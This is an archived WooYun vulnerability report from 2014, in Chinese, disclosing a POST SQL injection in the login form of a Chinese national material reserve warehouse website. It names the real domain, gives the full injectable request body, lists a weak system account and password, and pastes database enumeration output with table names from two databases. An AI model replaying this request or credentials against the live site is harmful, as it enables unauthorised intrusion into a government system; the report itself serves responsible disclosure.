乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-22: 细节已通知厂商并且等待厂商处理中 2014-01-27: 厂商已经确认,细节仅向厂商公开 2014-02-06: 细节向核心白帽子及相关领域专家公开 2014-02-16: 细节向普通白帽子公开 2014-02-26: 细节向实习白帽子公开 2014-03-08: 细节向公众公开
国家物资储备局某处仓库post注入一枚
手贱.刚刚测了437处.改了个数字436.居然也能访问。国家物资储备局四三六处:
http://www.gc436.com.cn
注入:
http://kjc.gc436.com.cn/ (POST)__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTkzNzM1NDM0NmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFBmludGVyMLWwne98nTjEKwz5NpE/b0pbRK2E&__EVENTVALIDATION=/wEWBAKJs7TTBgKvpuq2CALGmdGVDAK1%2Bo4qVZyggyTiLjVrcE4jf2QigyLAUvw%3D&username=admin&pwd=admin&inter0.x=60&inter0.y=11
系统用户 amdin/1
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: ccflow[58 tables]+---------------+| CN_Area || CN_City || CN_PQ || CN_Product || CN_QXS || CN_SF || CN_ZDS || Demo_Emp || Demo_Resume || Demo_SaleBill || ND1001 || ND101 || ND102 || ND1099 || ND10Rpt || ND1101 || ND1199 || ND11Rpt || ND1201 || ND1203 || ND1299 || ND12Rpt || ND199 || ND1Rpt || ND201 || ND202 || ND203 || ND204 || ND299 || ND2Rpt || ND301 || ND302 || ND303 || ND304 || ND399 || ND3Rpt || ND401 || ND402 || ND403 || ND404 || ND405 || ND406 || ND407 || ND499 || ND4Rpt || ND501 || ND501Dtl1 || ND502 || ND502Dtl1 || ND503 || ND503Dtl1 || ND504 || ND504Dtl1 || ND599 || ND599Dtl1 || ND5Rpt || ND5RptDtl1 || ND601 |+---------------+
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: jggl[57 tables]+-------------------------------+| AttornDetail || AttornOrder || ChargeCorrelative || ChargeDefine || ChargeItem || ChargeMaterial || Client || DetailGoodsOut || FieldSeed || FinishedStock || Hcsj || LogEvent || MachAircrew || MachCharge || MachCustos || MachFinishProduct || MachGroup || MachPlanProduct || MachType || MachUser || MachiningOrder || MachiningStuff || MachiningUser || MainGoodsOut || Material || Product || ProductArea || ReceiveGoods || VIEW_out || View_Attorn || View_AttornDetail || View_AttornOrder || View_Charge || View_ChargeCorrelative || View_ChargeDefine || View_ChargeItem || View_ChargeMaterial || View_FinishedGoods || View_Goods || View_LogEvent || View_MachiningBill || View_MachiningOrder || View_MachiningPlan || View_MachiningPlan_FinishProd || View_MachiningStuff || View_OrderDetail || View_OutDetail || View_OutMaster || View_PrintCharge || View_Stock || View_Test || dtproperties || kw_AttornDetail || kw_AttornOrder || machjz || tmp_DetailGoodsOut || tmp_MainGoodsOut |+-------------------------------+
危害等级:中
漏洞Rank:9
确认时间:2014-01-27 08:59
与http:///bugs/wooyun-2014-一并进行处置。
暂无